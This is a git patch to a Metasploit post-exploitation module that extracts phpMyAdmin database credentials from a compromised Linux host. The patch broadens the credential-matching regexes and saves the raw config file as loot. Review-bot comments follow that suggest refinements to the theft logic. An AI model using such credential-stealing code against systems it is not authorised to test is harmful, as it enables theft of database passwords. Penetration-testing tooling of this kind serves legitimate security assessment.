From 18ffd36409633104f11923e7579afd072128515b Mon Sep 17 00:00:00 2001
From: Shelby Pace
Date: Fri, 7 Sep 2018 08:13:10 -0500
Subject: [PATCH] storing config file, changed regex
---
 .../modules/post/linux/gather/phpmyadmin_credsteal.md | 1 +
 modules/post/linux/gather/phpmyadmin_credsteal.rb | 7 +++++--
 2 files changed, 6 insertions(+), 2 deletions(-)
diff --git a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
index 37cf5ffadf..ae077120c7 100644
--- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
+++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
@@ -41,6 +41,7 @@ PhpMyAdmin Creds Stealer!
 [+] User: admin
 [+] Password: acoolpassword
 [*] Storing credentials...
+[+] Config file located at /Users/space/.msf4/loot/20180907081056_default_192.168.37.226_phpmyadmin_conf_580315.txt
 [*] Post module execution completed
 msf5 post(linux/gather/phpmyadmin_credsteal) >
diff --git a/modules/post/linux/gather/phpmyadmin_credsteal.rb b/modules/post/linux/gather/phpmyadmin_credsteal.rb
index 6c5475b708..a05bd996f8 100644
--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -26,8 +26,8 @@ class MetasploitModule < Msf::Post
 end
 def parse_creds(contents)
- db_user = /\$dbuser=\'(.*)\';/.match(contents)
- db_pass = /\$dbpass=\'(.*)\';/.match(contents)
+ db_user = /\$dbuser=['"](.*)['"];/.match(contents)
+ db_pass = /\$dbpass=['"](.*)['"];/.match(contents)
 unless db_user && db_pass
 print_error("Couldn't find PhpMyAdmin credentials")
@@ -66,5 +66,8 @@ class MetasploitModule < Msf::Post
 print_good("Extracting creds")
 parse_creds(res)
+
+ p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
+ print_good("Config file located at #{p}")
 end
 end
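Review bot: The new patterns on the `db_user` and `db_pass` lines accept a closing quote that differs from the opening one, and `(.*)` is greedy, so on a line with a second quoted string followed by `;` the capture runs to the last quote and that whole run is taken as the value. Tying the closer to the opener and making the capture lazy, e.g. `/\$dbuser=(['"])(.*?)\1;/`, keeps the recorded value accurate. The value then sits in group 2, so whatever reads the match further down `parse_creds` (outside this hunk) would need the same adjustment. A one-line comment above the two patterns naming the file format they expect would also help the next reader.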
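Review bot: The local `p` in the added `store_loot` lines shadows `Kernel#p` and does not say what it holds; `loot_path = store_loot(...)` followed by `print_good("Config file located at #{loot_path}")` reads better. The last argument (the loot info string) only repeats the loot type, and a descriptive value such as `'PhpMyAdmin config file'` would be more useful in the loot listing. The call runs after `parse_creds(res)` whatever that found (the first `.rb` hunk only shows it printing an error; any early return is outside both hunks). A comment such as `# keep the raw config even when parsing fails; it holds the cleartext DB password` would make that intent and the sensitivity of the saved file explicit. The enclosing method starts outside the hunk.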